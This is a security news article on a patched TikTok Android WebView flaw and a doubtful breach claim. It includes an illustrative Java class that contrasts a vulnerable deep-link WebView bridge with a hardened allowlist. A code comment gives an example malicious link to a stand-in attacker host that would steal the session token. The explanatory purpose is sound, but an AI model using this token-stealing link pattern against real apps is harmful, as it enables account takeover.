CPO Magazine - News, Insights and Resources for Data Protection, Privacy and Cyber Security Leaders

“One-Click” TikTok Hack Discovered That Put 2 Billion App Users at Risk, but No Reports Yet of Account Takeover in the Wild

Scott Ikeda·September 8, 2022

A severe “one-click” TikTok hack that Microsoft discovered and reported to the social media giant was reportedly patched without incident, but a hacker has popped up on an underground forum to claim that they have stolen data for sale. The attack impacts the Android app version of the service and allows for an account takeover when a victim clicks on a malicious URL.

If the hacker’s story is to be believed, the information from two billion profiles could have been stolen. However, the evidence is thin at this point. Microsoft says that there is no evidence that the TikTok hack was ever used in the wild, and TikTok says that it has found no evidence of a breach.

TikTok hack put billions of accounts at risk, but evidence of public exposure remains thin

Microsoft’s 365 Defender Research Team discovered the account takeover vulnerability and reported it to TikTok in February of this year, but only recently disclosed it to the public. TikTok said that it patched the issue immediately after becoming aware of it. The vulnerability is present in versions of the Android app prior to 23.7.3, and TikTok users with automatic updates enabled (or those who have installed the app since March 2022) should already be protected. It was also present in every regional build of the Android app, including the ones distributed only in select Asian countries.

The vulnerability was rated “high severity” at the time and has since been assigned a CVSS score of 8.8 by the National Institute of Standards and Technology (NIST). The flaw let an attacker make the app’s embedded WebView load an arbitrary URL. A page loaded that way could reach the WebView’s JavaScript bridges (native Android methods the app registers so that its own web content can call them from page script), and through those bridges the attacker could read the user’s authentication token, which is all that is needed for a full account takeover. If a user clicked the malicious link, the attacker could assume full control of their profile, including uploading videos and messaging other users.
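The mechanics described above, as an added illustration that is not TikTok’s code or Microsoft’s proof of concept: an Android activity reachable from a deep link loads a URL taken from that link into a WebView that also carries a JavaScript bridge exposing the session token. The vulnerable pattern is shown commented out beside a hardened version. The package, activity, bridge, host names and the credential store are all hypothetical.

```java
// Added illustration (hypothetical app, not TikTok's code): a deep link such as
// app://open?url=<target> decides what an in-app WebView loads, and the WebView
// carries a JavaScript bridge that returns the session token.
package example.webview;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class DeepLinkWebViewActivity extends Activity {

    /** Bridge object exposed to page JavaScript as window.AppBridge (hypothetical). */
    static final class AppBridge {
        private final String sessionToken;
        AppBridge(String sessionToken) { this.sessionToken = sessionToken; }

        // Any page whose script runs in this WebView can call
        // AppBridge.getAuthToken() and send the result wherever it likes.
        @JavascriptInterface
        public String getAuthToken() { return sessionToken; }
    }

    // Hypothetical allowlist: the only hosts whose pages may use the bridge.
    private static final Set<String> TRUSTED_HOSTS =
        new HashSet<>(Arrays.asList("www.example-app.com", "m.example-app.com"));

    @Override
    protected void onCreate(Bundle saved) {
        super.onCreate(saved);
        WebView webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);

        // Navigations started inside the page (links, JS redirects) are checked
        // too, so a trusted page cannot carry the bridge over to an untrusted one.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isTrustedUrl(url);   // true = cancel the navigation
            }
        });

        Intent intent = getIntent();
        Uri deepLink = intent.getData();
        String target = deepLink == null ? null : deepLink.getQueryParameter("url");
        String token = loadSessionToken();

        // VULNERABLE pattern: the URL from the link is loaded as-is and the bridge
        // is attached regardless of where it points. One click on
        // app://open?url=https://attacker.example/steal.html puts attacker script
        // next to getAuthToken().
        //
        // webView.addJavascriptInterface(new AppBridge(token), "AppBridge");
        // webView.loadUrl(target);

        // HARDENED pattern: only an https URL on an exactly matching host gets the
        // bridge; anything else falls back to a fixed in-app page without it.
        if (target != null && isTrustedUrl(target)) {
            webView.addJavascriptInterface(new AppBridge(token), "AppBridge");
            webView.loadUrl(target);
        } else {
            webView.loadUrl("https://www.example-app.com/home");
        }
    }

    /** Exact-match allowlist on an https origin; no substring or prefix checks. */
    static boolean isTrustedUrl(String url) {
        Uri u = Uri.parse(url);
        if (!"https".equals(u.getScheme())) return false;           // rejects javascript:, file:, http:
        String host = u.getHost();
        if (host == null || u.getUserInfo() != null) return false;  // rejects https://trusted@evil tricks
        return TRUSTED_HOSTS.contains(host.toLowerCase());
    }

    private String loadSessionToken() {
        // Stand-in for the app's real credential store (hypothetical).
        return getSharedPreferences("session", MODE_PRIVATE).getString("token", "");
    }
}
```

Two points a reviewer would check in the hardened branch: the allowlist compares the whole host for equality rather than testing `contains("example-app.com")` or `startsWith("https://www.example-app.com")`, both of which a host such as `www.example-app.com.attacker.example` would satisfy; and the bridge is attached only after validation, so a page the check rejects never sees `window.AppBridge` at all. Because `android.net.Uri` and the WebView’s own Chromium parser do not always agree on unusual inputs, the safest design keeps the bridge off for any URL the app did not construct itself.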

After account takeover bug reported, hacker claims exposed data for over a billion users, offers it for sale

Initially it appeared that this was a simple case of a serious vulnerability being discovered internally, patched and then acknowledged when it was safe months after the fact. Then a threat actor popped up on an underground forum claiming that they had exploited a TikTok hack that had allowed them to steal 34GB of user data.

It is not entirely clear if the attacker is claiming use of the account takeover vulnerability to steal the data, but they purported to have about 1.37 billion user records for sale (nearly the total count of estimated Android app users) and appeared with the offer not long after the vulnerability was disclosed to the public.

The offer appeared on the underground “Breach Forums” message board, posted by a user calling themselves “AgainstTheWest.” They indicated that they were considering either selling the data or simply dumping it to the public.

Security researchers who have examined the available evidence are, so far, not convinced that the data came from a genuine TikTok hack or that account takeovers were involved. Troy Hunt, the security researcher who runs Have I Been Pwned, analyzed the 237 MB sample the threat actor provided and found no clear evidence tying it to a new breach: some of the included data was already publicly available, and other portions were junk or test data.

Davey Winder, security researcher and senior cybersecurity contributor for Forbes, recently conducted a deeper dive into the purported TikTok hack and echoed the results of the Have I Been Pwned analysis. Winder added that the data included in the sample appeared to come from a third-party marketing firm that works with TikTok, something that has since been supported by statements from TikTok themselves. Bob Diachenko, another prominent cybersecurity analyst, has added that he believes the data came from a marketing company based in Hangzhou City, China. It is unclear exactly how much user information this firm had access to.

Though there are not yet any signs of successful account takeover and TikTok is not recommending any special security steps at this time, Android users should confirm they are running app version 23.7.3 or later, and may want to enable two-factor authentication (2FA) on their accounts out of an abundance of caution. Note that 2FA protects against password-based logins; it would not have stopped the WebView attack itself, which captured an already-issued authentication token from a logged-in session. TikTok is coming off of a potentially more concerning incident over the summer, in which it was revealed that engineers in China have extensive access to foreign user accounts despite promises from the company that this would no longer happen. TikTok also experienced a third-party data leak in 2020, though that dataset included profiles from other services such as Instagram and YouTube and did not potentially impact nearly as much of its user base.

Scott Ikeda
Senior Correspondent at CPO Magazine
Scott Ikeda is a technology futurist and writer for more than 15 years. He travels extensively throughout Asia and writes about the impact of technology on the communities he visits. Over the last 5 years, Scott has grown increasingly focused on the future landscape of big data, surveillance, cybersecurity and the right to privacy.